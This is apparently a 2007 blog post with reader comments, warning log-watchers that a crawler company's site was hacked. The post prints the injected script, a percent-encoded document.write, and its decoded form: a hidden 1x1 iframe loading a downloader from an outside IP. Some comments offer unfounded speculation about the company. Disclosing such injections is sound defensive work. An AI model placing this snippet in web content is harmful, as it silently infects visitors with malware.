Friday, January 05, 2007

Bot Hunters Beware: Search Engine Site Hacked

Beware that investigating user agents and referrers that show up in your log files because you could just end up being infected with a virus!

This little crawler left a his calling card:

38.99.203.110 "panscient.com"
A quick trip to the Panscient site shows it has been hacked and the home page has this javascript inserted into the top of the file:
<script language="javascript"> document.write(
unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') ); </script>
When decoded that javascript becomes a link to the source of the downloader virus:
<iframe src= http://81.95.146.98/index.html
frameborder="0" width="1" height="1" scrolling="no"
name=counter></iframe>
Thanks to John Andrews for the tip that they were hacked and spreading a virus as I've been to Panscient's site before and didn't notice anything wrong., but it was definitely infected I went there today!
 Just heed this as a cautionary tale that things in your log file could be a lure by hackers to infect you with something not currently detected by virus scanners, which is a good reason why I disable javascript when I do most of my bot hunting.

Besides, who best to hack and humiliate than the very people that battle these vermin on a daily basis?

So bot busters BEWARE!

UPDATE - I checked other domains on the server and it's hacked all over the place. Hard to believe that a company selling custom search engines doesn't even have their own dedicated server, just weird.

12 comments:

Scott Allen said...

I got hit by this today as well.

mojomike said...

could you hint at the virus detection software you are using?

John Andrews said...

Seems to be fixed already at panscient, Bill. I also checked a pair of the other hijacked domains on that server and they are clean as well.

Good work letting them know.

WillMacc said...

I've got a guy on my blog that says he's the CEO of panscient.
Something doesn't add up. As soon as I post something about Cogent, PSI and Sproose, the "CEO" pops up and you post this.....
Odd.... Smells Phishy..

Jonathan Baxter said...

Hard to believe that a company selling custom search engines doesn't even have their own dedicated server, just weird.

It's just more to manage if we have our own server. www.panscient.com doesn't get huge traffic, so it is cheaper to pay $10/month to a hosting provider than to do it ourselves. Or at least it was until we got hacked...

Thanks for the heads-up.

- Jonathan Baxter

Billy The Blogging Poet said...

Here's an idea that would stop spam forever.
http://bloggingpoet.squarespace.com/bloggingpoetcom/2007/1/9/the-anti-spam-reserves-finally-an-end-to-spam.html

IncrediBILL said...

Sorry John Andrews, iPowerWeb didn't clean up the server, only clearned the few accounts I reported. The server still has this infestation in many accounts.

P.S. Glad to see panscient moved as this problem isn't fixed.

Johann said...

I blogged extensively about panscient.com in the past, including the claims by their CEO.

I've been blocking them for ages.

Jonathan Baxter said...

Johann, please check out this comment I just left on your blog.

- Jonathan Baxter

Anonymous said...

I was hammed by this bot a few days ago and it tripped my trap. I found this information too. It makes you wonder about these places that use mail drops for their business addresses:

The address listed for this company is nothing more than a "virtual office" or "mail drop" at Alliance Business Centers, 620 Herndon Parkway Suite 200, Herndon VA 20170.

Why would a company claiming to be a normal business be using a mail drop in Herndon, Virginia? Good question. I know that there are a lot of U.S. Government contractors and sub-contractors in the Herndon VA area. Coincidence? I think not.

^38. seems to have a lot of problems and isn't it so nice that one company, Cogentco, based in Washington DC, seems to own all of ^38.

I say 403 to ^38. and I think it is a storefront.

Anonymous said...

Has anybody had any bad experiences with a company called Websense violating robots.txt and sucking a server dry?

A friend of mine told me that he has a friend who used to work for them and he told me that if you block them at .htaccess they will use partner companies and companies that use their subscriptions services to go around your .htaccess As I understand it they will even use servers from state and local governments that subscribe to Websense to hit your site. I don't know if that is true, but I had odd searches after I blocked Websense that acted like a bot.

Any help would be appreciated because I don't appreciate a company that is involved in censorship stepping on my server.

IncrediBILL said...

Funny you mention WebSense as I've just been investigating WebSense's actitivy lately and looking into blocking some of this nonsense.

May post about it real soon...